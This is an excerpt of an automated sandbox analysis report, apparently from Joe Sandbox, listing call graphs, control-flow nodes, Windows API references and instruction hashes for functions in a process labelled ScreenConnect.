calls 40182 5723c2e 40181->40182 40182->40149 40183->40181 40185 57212d1 40184->40185 40187 40d5021 2 API calls 40185->40187 40186 57212fe 40186->40149 40187->40186 40192 5721580 40188->40192 40196 5721574 40188->40196 40193 57215aa OpenSCManagerA 40192->40193 40195 57216c3 40193->40195 40197 572157a OpenSCManagerA 40196->40197 40199 57216c3 40197->40199 40475 5721340 40478 57213b8 2 API calls 40475->40478 40479 5721367 40475->40479 40476 572134e 40478->40476 40480 5721389 40479->40480 40482 40d5021 2 API calls 40480->40482 40481 57213af 40481->40476 40482->40481 40290 57229e1 40293 5722a9f 40290->40293 40297 5722ad0 40293->40297 40301 5722ac0 40293->40301 40294 57229fb 40298 5722af7 40297->40298 40299 57212c0 2 API calls 40298->40299 40300 5722b07 40298->40300 40299->40300 40300->40300 40302 5722af7 40301->40302 40303 57212c0 2 API calls 40302->40303 40304 5722b07 40302->40304 40303->40304 40304->40304 40200 5741cb0 40201 5741cce 40200->40201 40203 5741ce7 40201->40203 40206 5741dff 40201->40206 40205 5741dff CreateFileA 40205->40203 40207 5741e1d 40206->40207 40211 574d690 40207->40211 40215 574d680 40207->40215 40212 574d6a3 40211->40212 40219 574bc20 40212->40219 40216 574d690 40215->40216 40217 574bc20 CreateFileA 40216->40217 40218 5741d10 40217->40218 40218->40205 40220 574d6e0 CreateFileA 40219->40220 40222 574d815 40220->40222 40448 5743c50 40449 5743ca4 ConnectNamedPipe 40448->40449 40450 5743ce0 40449->40450 40483 5740040 40485 574006b 40483->40485 40484 57404b0 40485->40484 40488 1917910 40485->40488 40493 1917920 40485->40493 40489 191794a 40488->40489 40490 1917965 40489->40490 40491 1916558 2 API calls 40489->40491 40492 1916568 2 API calls 40489->40492 40490->40485 40491->40490 40492->40490 40494 191794a 40493->40494 40495 1917965 40494->40495 40496 1916558 2 API calls 40494->40496 40497 1916568 2 API calls 40494->40497 40495->40485 40496->40495 40497->40495 40498 574b800 40499 574b825 40498->40499 40500 574b848 40499->40500 40503 574c820 40499->40503 40507 574c80f 40499->40507 40504 574c86c 40503->40504 40505 574c82e 40503->40505 40504->40500 40505->40504 40506 57433a0 OpenSCManagerA OpenSCManagerA 40505->40506 40506->40505 40508 574c86c 40507->40508 40509 574c82e 40507->40509 40508->40500 40509->40508 40510 57433a0 OpenSCManagerA OpenSCManagerA 40509->40510 40510->40509 40451 40d4128 40452 40d415c 40451->40452 40453 40d414c 40451->40453 40459 40d4358 40452->40459 40467 40d434a 40452->40467 40454 40d4155 40453->40454 40455 40d4358 2 API calls 40453->40455 40456 40d434a 2 API calls 40453->40456 40455->40453 40456->40453 40460 40d437b 40459->40460 40462 40d438b 40459->40462 40461 40d4384 40460->40461 40465 1916558 2 API calls 40460->40465 40466 1916568 2 API calls 40460->40466 40461->40453 40463 1916558 2 API calls 40462->40463 40464 1916568 2 API calls 40462->40464 40463->40460 40464->40460 40465->40460 40466->40460 40469 40d438b 40467->40469 40470 40d437b 40467->40470 40468 40d4384 40468->40453 40471 1916558 2 API calls 40469->40471 40472 1916568 2 API calls 40469->40472 40470->40468 40473 1916558 2 API calls 40470->40473 40474 1916568 2 API calls 40470->40474 40471->40470 40472->40470 40473->40470 40474->40470 40223 5741e78 40224 5741ec0 WaitNamedPipeW 40223->40224 40225 5741eba 40223->40225 40226 5741ef4 40224->40226 40225->40224 40227 40d2ec0 40228 40d2edc 40227->40228 40229 40d2efa 40227->40229 40228->40229 40242 40d33a1 40228->40242 40246 40d3391 40228->40246 40250 40d3377 40228->40250 40254 40d33a5 40228->40254 40258 40d3395 40228->40258 40262 40d33a9 40228->40262 40266 40d3399 40228->40266 40270 40d3389 40228->40270 40274 40d33bf 40228->40274 40278 40d339d 40228->40278 40282 40d338d 40228->40282 40286 40d33d0 40228->40286 40243 40d33ad 40242->40243 40244 40d355c 40243->40244 40245 40d5021 2 API calls 40243->40245 40245->40243 40247 40d33ad 40246->40247 40248 40d355c 40247->40248 40249 40d5021 2 API calls 40247->40249 40249->40247 40251 40d3382 40250->40251 40252 40d355c 40251->40252 40253 40d5021 2 API calls 40251->40253 40253->40251 40255 40d33ad 40254->40255 40256 40d355c 40255->40256 40257 40d5021 2 API calls 40255->40257 40257->40255 40259 40d33ad 40258->40259 40260 40d355c 40259->40260 40261 40d5021 2 API calls 40259->40261 40261->40259 40263 40d33ad 40262->40263 40264 40d355c 40263->40264 40265 40d5021 2 API calls 40263->40265 40265->40263 40268 40d33ad 40266->40268 40267 40d355c 40268->40267 40269 40d5021 2 API calls 40268->40269 40269->40268 40271 40d33ad 40270->40271 40272 40d355c 40271->40272 40273 40d5021 2 API calls 40271->40273 40273->40271 40275 40d33ef 40274->40275 40276 40d355c 40275->40276 40277 40d5021 2 API calls 40275->40277 40277->40275 40279 40d33ad 40278->40279 40280 40d355c 40279->40280 40281 40d5021 2 API calls 40279->40281 40281->40279 40283 40d33ad 40282->40283 40284 40d355c 40283->40284 40285 40d5021 2 API calls 40283->40285 40285->40283 40287 40d33ef 40286->40287 40288 40d355c 40287->40288 40289 40d5021 2 API calls 40287->40289 40289->40287

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 040D33BF Relevance: 2.8, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 264 40d33bf-40d3418 269 40d341a-40d342e 264->269 270 40d3452-40d3481 264->270 273 40d3437-40d3447 269->273 274 40d3430 269->274 279 40d34c4-40d34eb call 40d28e0 270->279 280 40d3483-40d3499 270->280 273->270 274->273 343 40d34ee call 40d3830 279->343 344 40d34ee call 40d3860 279->344 284 40d349b 280->284 285 40d34a2-40d34c2 280->285 284->285 285->279 290 40d34f0-40d3501 291 40d355c-40d356b 290->291 292 40d3503-40d351d 290->292 293 40d356d-40d3581 291->293 294 40d35b0-40d35d7 291->294 302 40d374e 292->302 303 40d3523-40d354d call 40d5021 292->303 298 40d358a-40d35ae 293->298 299 40d3583 293->299 304 40d35d9-40d360f 294->304 305 40d3612-40d3636 294->305 298->294 299->298 306 40d3753-40d3764 302->306 324 40d3553-40d355a 303->324 304->305 314 40d3638-40d366f 305->314 315 40d3671-40d36b7 305->315 322 40d3765 306->322 314->315 329 40d36bd-40d36d7 315->329 330 40d3739-40d374c 315->330 322->322 324->291 324->292 329->302 333 40d36d9-40d370a 329->333 330->306 338 40d370c-40d3728 333->338 339 40d3730-40d3737 333->339 338->339 339->329 339->330 343->290 344->290
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ;#$k!
                                                                                                                                                                                                                                                        • API String ID: 0-1260452682
                                                                                                                                                                                                                                                        • Opcode ID: b7395f4d706bbe03abcc1f5549b30f1bbce75aa78644ffd5f8e637bba3bcd864
                                                                                                                                                                                                                                                        • Instruction ID: 3cebf667217d267822ccb9f49d6d9a6598a4f38a4f0dba5b139e4ffd0ee8057c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7395f4d706bbe03abcc1f5549b30f1bbce75aa78644ffd5f8e637bba3bcd864
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1FB18C70A003059FEB15EF68D480A9EB7F2AF84704B55C969D80AEB350DF71FD4A8B91
                                                                                                                                                                                                                                                        Function 040D3377 Relevance: 2.8, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 345 40d3377-40d3380 346 40d33ec-40d33ed 345->346 347 40d3382-40d33b8 345->347 346->346 349 40d33ef-40d3418 346->349 347->346 353 40d341a-40d342e 349->353 354 40d3452-40d3481 349->354 357 40d3437-40d3447 353->357 358 40d3430 353->358 363 40d34c4-40d34eb call 40d28e0 354->363 364 40d3483-40d3499 354->364 357->354 358->357 426 40d34ee call 40d3830 363->426 427 40d34ee call 40d3860 363->427 368 40d349b 364->368 369 40d34a2-40d34c2 364->369 368->369 369->363 374 40d34f0-40d3501 375 40d355c-40d356b 374->375 376 40d3503-40d351d 374->376 377 40d356d-40d3581 375->377 378 40d35b0-40d35d7 375->378 386 40d374e 376->386 387 40d3523-40d354d call 40d5021 376->387 382 40d358a-40d35ae 377->382 383 40d3583 377->383 388 40d35d9-40d360f 378->388 389 40d3612-40d3636 378->389 382->378 383->382 390 40d3753-40d3764 386->390 408 40d3553-40d355a 387->408 388->389 398 40d3638-40d366f 389->398 399 40d3671-40d36b7 389->399 406 40d3765 390->406 398->399 413 40d36bd-40d36d7 399->413 414 40d3739-40d374c 399->414 406->406 408->375 408->376 413->386 417 40d36d9-40d370a 413->417 414->390 422 40d370c-40d3728 417->422 423 40d3730-40d3737 417->423 422->423 423->413 423->414 426->374 427->374
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ;#$k!
                                                                                                                                                                                                                                                        • API String ID: 0-1260452682
                                                                                                                                                                                                                                                        • Opcode ID: 5e3eb4ce7d3fba86c1f083bad6acd8d63b00df3149299ef4a6db1a1132da9f84
                                                                                                                                                                                                                                                        • Instruction ID: eca1d983f957b7f24b42fe7547e9a9e64b88a50cc3ab654a7634d2a6ed8510ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e3eb4ce7d3fba86c1f083bad6acd8d63b00df3149299ef4a6db1a1132da9f84
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7A18D70A003019FEB15DF68D480A9EB7F2AF85704B55C969D80AEB314DF71FD4A8B92
                                                                                                                                                                                                                                                        Function 040D33D0 Relevance: 2.8, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 429 40d33d0-40d3418 434 40d341a-40d342e 429->434 435 40d3452-40d3481 429->435 438 40d3437-40d3447 434->438 439 40d3430 434->439 444 40d34c4-40d34eb call 40d28e0 435->444 445 40d3483-40d3499 435->445 438->435 439->438 508 40d34ee call 40d3830 444->508 509 40d34ee call 40d3860 444->509 449 40d349b 445->449 450 40d34a2-40d34c2 445->450 449->450 450->444 455 40d34f0-40d3501 456 40d355c-40d356b 455->456 457 40d3503-40d351d 455->457 458 40d356d-40d3581 456->458 459 40d35b0-40d35d7 456->459 467 40d374e 457->467 468 40d3523-40d354d call 40d5021 457->468 463 40d358a-40d35ae 458->463 464 40d3583 458->464 469 40d35d9-40d360f 459->469 470 40d3612-40d3636 459->470 463->459 464->463 471 40d3753-40d3764 467->471 489 40d3553-40d355a 468->489 469->470 479 40d3638-40d366f 470->479 480 40d3671-40d36b7 470->480 487 40d3765 471->487 479->480 494 40d36bd-40d36d7 480->494 495 40d3739-40d374c 480->495 487->487 489->456 489->457 494->467 498 40d36d9-40d370a 494->498 495->471 503 40d370c-40d3728 498->503 504 40d3730-40d3737 498->504 503->504 504->494 504->495 508->455 509->455
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ;#$k!
                                                                                                                                                                                                                                                        • API String ID: 0-1260452682
                                                                                                                                                                                                                                                        • Opcode ID: acfbd01af7aa0a6eaa321e0656faa2ef76c110d50b55575e575597b433f47c35
                                                                                                                                                                                                                                                        • Instruction ID: e52eb9efe147af555727a17168e2d7985b2d5f90c4056e99a65a1717a37a262e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: acfbd01af7aa0a6eaa321e0656faa2ef76c110d50b55575e575597b433f47c35
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BEA18D70A003059FEB15EF68D480A9EB7F2AF84704B55C969D80AEB350DF71FD468B92
                                                                                                                                                                                                                                                        Function 01915DC0 Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 650 1915dc0-1915dc8 652 1915e16-1915e4f call 1910420 650->652 653 1915dca-1915dd3 650->653 661 1915e55-1915e60 652->661 662 1915fda-1915fe1 652->662 653->652 661->662 664 1915e66-1915e7d call 19159e0 661->664 667 1915ec0-1915ecf 664->667 668 1915e7f-1915e95 664->668 671 1915ed1-1915edd 667->671 672 1915edf-1915ee8 667->672 673 1915e97 668->673 674 1915e9e-1915ebe 668->674 671->672 675 1915f12-1915f17 672->675 676 1915eea-1915f10 672->676 673->674 674->667 679 1915f1f-1915f35 675->679 676->675 686 1915fa5-1915fbe 679->686 687 1915f37-1915f5e 679->687 690 1915fc0 686->690 691 1915fc9-1915fca 686->691 695 1915f60-1915f87 687->695 696 1915f98-1915fa3 687->696 690->691 691->662 695->696 701 1915f89-1915f96 695->701 696->686 696->687 701->686
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: `q$nCq
                                                                                                                                                                                                                                                        • API String ID: 0-2487012879
                                                                                                                                                                                                                                                        • Opcode ID: b96d42adbfbeef6ed7a613b8b5563e33d3eb439f099ee96f0734fa37c86a21eb
                                                                                                                                                                                                                                                        • Instruction ID: 45bada14de0a3ddb1dc660c54ff7f34ec210bd1f400f8454820df46a564e4327
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b96d42adbfbeef6ed7a613b8b5563e33d3eb439f099ee96f0734fa37c86a21eb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 354191307003068FE715EB38C59476E77E6AFC9601B168468D44ADB359EF70EC82CB91
                                                                                                                                                                                                                                                        Function 019191B8 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 703 19191b8-19191ec 704 19191f3-19191f8 703->704 705 1919210-1919214 704->705 706 19191fa-1919200 704->706 709 1919222-1919239 705->709 710 1919216-191921c 705->710 707 1919202 706->707 708 1919204-191920e 706->708 707->705 708->705 711 1919220 710->711 712 191921e 710->712 711->709 712->709
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: t*Xt$t*Xt
                                                                                                                                                                                                                                                        • API String ID: 0-1672810414
                                                                                                                                                                                                                                                        • Opcode ID: 869ade23d4e37c2feb866adba805c9bbb2a164830e1a1d3d91ad5bd43fa4bc30
                                                                                                                                                                                                                                                        • Instruction ID: 605493d8a3e436b7f5957d925b0e37fe9360a8f9a5571bec3445ae2367eae12c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 869ade23d4e37c2feb866adba805c9bbb2a164830e1a1d3d91ad5bd43fa4bc30
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13118E71F00208AFEB24CE69C800AEBBBFAAFC5705F148866D159D7248E7719981CB90
                                                                                                                                                                                                                                                        Function 0574BC6A Relevance: 1.6, APIs: 1, Instructions: 144fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 839 574bc6a-574bc98 842 574bc23-574bc27 839->842 843 574bc9a-574bc9b 839->843 844 574d6e0-574d73c 842->844 843->844 845 574d790-574d813 CreateFileA 844->845 846 574d73e-574d763 844->846 855 574d815-574d81b 845->855 856 574d81c-574d85a 845->856 846->845 849 574d765-574d767 846->849 850 574d769-574d773 849->850 851 574d78a-574d78d 849->851 853 574d775 850->853 854 574d777-574d786 850->854 851->845 853->854 854->854 857 574d788 854->857 855->856 861 574d85c-574d860 856->861 862 574d86a 856->862 857->851 861->862 863 574d862 861->863 864 574d86b 862->864 863->862 864->864
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0574D7FD
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816976607.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5740000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        • Opcode ID: a9eaf8699dd8bccee73bb379ed73a50daa544bb12d1d164b7604d452cb48a4f0
                                                                                                                                                                                                                                                        • Instruction ID: 1046e8284cacfb44016d433334d1de42164c572d83a40f30e8b10925b38ea92e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9eaf8699dd8bccee73bb379ed73a50daa544bb12d1d164b7604d452cb48a4f0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C518AB1D043489FDB21CFA9C884BDEBBF2FB48304F24816AD848AB252D7759845CF91
                                                                                                                                                                                                                                                        Function 05721574 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 865 5721574-5721578 866 57215aa-57215d9 865->866 867 572157a-57215a9 865->867 868 5721612-5721630 866->868 869 57215db-57215e5 866->869 867->866 877 5721632-572163c 868->877 878 5721669-57216c1 OpenSCManagerA 868->878 869->868 871 57215e7-57215e9 869->871 872 57215eb-57215f5 871->872 873 572160c-572160f 871->873 875 57215f7 872->875 876 57215f9-5721608 872->876 873->868 875->876 876->876 879 572160a 876->879 877->878 880 572163e-5721640 877->880 884 57216c3-57216c9 878->884 885 57216ca-5721702 878->885 879->873 882 5721642-572164c 880->882 883 5721663-5721666 880->883 886 5721650-572165f 882->886 887 572164e 882->887 883->878 884->885 892 5721712-5721716 885->892 893 5721704-5721708 885->893 886->886 888 5721661 886->888 887->886 888->883 894 5721726 892->894 895 5721718-572171c 892->895 893->892 896 572170a 893->896 898 5721727 894->898 895->894 897 572171e 895->897 896->892 897->894 898->898
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • OpenSCManagerA.SECHOST(?,?,?), ref: 057216AB
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816946745.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5720000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ManagerOpen
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1889721586-0
                                                                                                                                                                                                                                                        • Opcode ID: 8c67df7fb2a0e2f7cb057a559e6a79fa78cbf970b2ca6e8e89f6b84d5d09002b
                                                                                                                                                                                                                                                        • Instruction ID: 142c8a4de8c0592a7329f48aeec563aa9d39872bee7042136227201e3c3a0437
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c67df7fb2a0e2f7cb057a559e6a79fa78cbf970b2ca6e8e89f6b84d5d09002b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1517A71D003699FDB14CFA9C8857AEBBF1FB48310F688129E816AB340DB749885DB81
                                                                                                                                                                                                                                                        Function 05721580 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 899 5721580-57215d9 901 5721612-5721630 899->901 902 57215db-57215e5 899->902 909 5721632-572163c 901->909 910 5721669-57216c1 OpenSCManagerA 901->910 902->901 903 57215e7-57215e9 902->903 904 57215eb-57215f5 903->904 905 572160c-572160f 903->905 907 57215f7 904->907 908 57215f9-5721608 904->908 905->901 907->908 908->908 911 572160a 908->911 909->910 912 572163e-5721640 909->912 916 57216c3-57216c9 910->916 917 57216ca-5721702 910->917 911->905 914 5721642-572164c 912->914 915 5721663-5721666 912->915 918 5721650-572165f 914->918 919 572164e 914->919 915->910 916->917 924 5721712-5721716 917->924 925 5721704-5721708 917->925 918->918 920 5721661 918->920 919->918 920->915 926 5721726 924->926 927 5721718-572171c 924->927 925->924 928 572170a 925->928 930 5721727 926->930 927->926 929 572171e 927->929 928->924 929->926 930->930
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • OpenSCManagerA.SECHOST(?,?,?), ref: 057216AB
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816946745.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5720000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ManagerOpen
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1889721586-0
                                                                                                                                                                                                                                                        • Opcode ID: 675c48e454fe788e90def1248766ce9625ca575bcb72a0873d1ef0339dd8f66e
                                                                                                                                                                                                                                                        • Instruction ID: cb69e7de9e34096e3a95ffa2cdde7c7639bd112d73dd600c6357622ee3497997
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 675c48e454fe788e90def1248766ce9625ca575bcb72a0873d1ef0339dd8f66e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4513871D007699FDB14CFA9C8857ADBBB1FB48310F648129E815A7340DB749885DB81
                                                                                                                                                                                                                                                        Function 0574D6D4 Relevance: 1.6, APIs: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 931 574d6d4-574d73c 933 574d790-574d813 CreateFileA 931->933 934 574d73e-574d763 931->934 943 574d815-574d81b 933->943 944 574d81c-574d85a 933->944 934->933 937 574d765-574d767 934->937 938 574d769-574d773 937->938 939 574d78a-574d78d 937->939 941 574d775 938->941 942 574d777-574d786 938->942 939->933 941->942 942->942 945 574d788 942->945 943->944 949 574d85c-574d860 944->949 950 574d86a 944->950 945->939 949->950 951 574d862 949->951 952 574d86b 950->952 951->950 952->952
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0574D7FD
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816976607.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5740000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        • Opcode ID: f17d6db5d0a29c3e3c7c80e05d09517d74f9ceb58d5fdd51fa217a766db11c78
                                                                                                                                                                                                                                                        • Instruction ID: 1c073ec2783be4602c01de3ee2fc737df0549d87536bfe1361bd42ecc5bbb784
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f17d6db5d0a29c3e3c7c80e05d09517d74f9ceb58d5fdd51fa217a766db11c78
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 495135B1D003499FDB21CFA9C984B9EBBF2FB48304F248129E858AB355D7B59845CF91
                                                                                                                                                                                                                                                        Function 0574BC20 Relevance: 1.6, APIs: 1, Instructions: 119fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0574D7FD
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816976607.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5740000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        • Opcode ID: 255864e6de1d827af5fd7b58379e28e8a623c45c1848bab541edd342970d0b21
                                                                                                                                                                                                                                                        • Instruction ID: 46eb08edaed90e69e602bddc6ac479217e1d9e98ba13eda8a4c8989161bdfddb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 255864e6de1d827af5fd7b58379e28e8a623c45c1848bab541edd342970d0b21
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 745156B1D003499FDB20CFA9C944B9EBBF2FB48304F248029E858AB351D7B59845CF91
                                                                                                                                                                                                                                                        Function 05743C45 Relevance: 1.6, APIs: 1, Instructions: 70pipeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ConnectNamedPipe.KERNEL32(00000000), ref: 05743CC8
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1816976607.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_5740000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConnectNamedPipe
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2191148154-0
                                                                                                                                                                                                                                                        • Opcode ID: 11451d078ee67277a6ba07ec2b7f4f4ebc2a839a3c1ef297bd3994ea82615c9e
                                                                                                                                                                                                                                                        • Instruction ID: dda75974fb40b0ea7112efc3db793a516c83b2cae5126c9cc6dc89ff34d0cc5f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11451d078ee67277a6ba07ec2b7f4f4ebc2a839a3c1ef297bd3994ea82615c9e
